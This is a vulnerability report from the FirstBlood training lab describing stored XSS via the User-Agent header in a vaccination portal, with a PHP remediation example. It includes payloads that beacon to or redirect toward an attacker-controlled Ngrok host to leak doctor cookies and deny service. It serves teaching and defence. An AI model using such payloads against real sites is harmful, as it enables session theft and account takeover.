FirstBlood-#864[COLLAB] Stored/Blind XSS / DOS via vaccination portal
This issue was discovered on FirstBlood v2

On 2021-10-29, amec0e Level 3 reported:

Hey mate,

I noticed when we view the vaccination-manager/portal.php endpoint we can see that our User-Agent: is reflected on the page. Because there is no filtering in place, a user can upload a vaccination proof image and edit their User-Agent: with a HTML payload which will then fire on the backend to our Ngrok server. Luckily the HttpOnly flag is set for the cookie vaccination_manager and so this token cannot be leaked to our Ngrok address. However, if a doctor has signed in and has not logged out then an attacker can indeed leak the doctorAuthed and drps cookies along with the request due to the lack of a HttpOnly flag set.

It is also possible to cause a Denial of Service to the portal.php endpoint using the payload below as this WILL redirect the admin user to our ngrok address rendering the portal.php endpoint unusable until the injected entry is removed.

<script>window.location.href=`NGROK`</script>

Impact:

We can execute our own HTML because no filters are in place to check that the User-Agent: is properly sanitised when reflected on the portal.php page. We can leak the cookies drps and doctorAuthed, which would lead to an account takeover of a doctor's account if not signed out when viewing portal.php. This also leads to a DOS of the portal.php page due to a script redirection.

Steps to Reproduce:

  • Visit the endpoint /vaccination-manager/pub/upload-vaccination-proof.php
  • Enter a random email and select a normal image file.
  • Open Burp Suite and make sure "Intercept is on".
  • Click "Upload" and view the intercepted request.
  • Add the following payload along with your Ngrok address in the User-Agent: header.

    <img src=http://NGROKADDRESS>

NOTE:

For DOS of portal.php, use the payload below:

<script>window.location.href=`http://NGROKADDRESS/`</script>

  • Now "Forward" all requests.
  • Visit the endpoint /vaccination-manager/login.php and log in with valid credentials.

You will now be able to see a hit back to our ngrok address, OR if you used the DOS payload you will be redirected to your ngrok address, rendering the page unusable by the admin.

The DOS payload will redirect us to the ngrok default Apache page.

Remediation:

Properly sanitise the User-Agent: header by stripping or encoding HTML tags before it is reflected.

Best Regards,

Amec0e.

In Collaboration With thebinarybot

P2 High

FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof, it is possible to achieve stored XSS against admins via the User-Agent header. As this value typically can't be user controlled, the developers did not think it was 'worth' protecting against XSS.
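The root cause above is a trusted request header rendered as HTML. The following PHP, added here as an illustration and not FirstBlood's own code, shows the vulnerable rendering pattern beside a hardened one (output encoding, header normalisation, HttpOnly session cookies and a CSP); the function names, table layout and cookie values are assumptions.

```php
<?php
// Added example, not the FirstBlood source. Assumes the upload handler stores
// the request's User-Agent with each proof and portal.php lists the records.

// --- Vulnerable pattern (the behaviour the report describes) ---
// The header is treated as "not user controlled" and echoed straight into HTML,
// so <img src=...> beacons and <script> redirects run in the admin's browser.
function renderRowVulnerable(array $row): string {
    return '<tr><td>' . $row['email'] . '</td><td>' . $row['user_agent'] . '</td></tr>';
}

// --- Hardened version ---
// 1. Contextual output encoding: a stored header is text, never markup.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
function renderRowSafe(array $row): string {
    return '<tr><td>' . h($row['email']) . '</td><td>' . h($row['user_agent']) . '</td></tr>';
}

// 2. Defence in depth at storage time: drop control characters and cap the
//    length so the admin view cannot be flooded through the same header.
function normaliseUserAgent(?string $ua): string {
    $ua = preg_replace('/[\x00-\x1F\x7F]/', '', $ua ?? '');
    return mb_substr($ua, 0, 512, 'UTF-8');
}

// 3. Doctor session cookies get HttpOnly (plus Secure/SameSite), which is what
//    kept vaccination_manager from being leaked while doctorAuthed/drps were not.
function setDoctorCookie(string $name, string $value): void {
    setcookie($name, $value, [
        'expires'  => time() + 3600,
        'path'     => '/vaccination-manager/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

// 4. A CSP with no inline script and no third-party image sources blocks both
//    payloads from the report even if an encoding call is missed somewhere.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");

// Constructed sample record: the redirect payload is rendered as literal text.
$row = ['email' => 'patient@example.invalid',
        'user_agent' => normaliseUserAgent('<script>window.location.href=`http://attacker.invalid/`</script>')];
echo renderRowSafe($row), "\n";
```

The hardened row prints the payload as `&lt;script&gt;...` inside the cell, and the CSP gives the doctor view a second layer should another reflected field be missed.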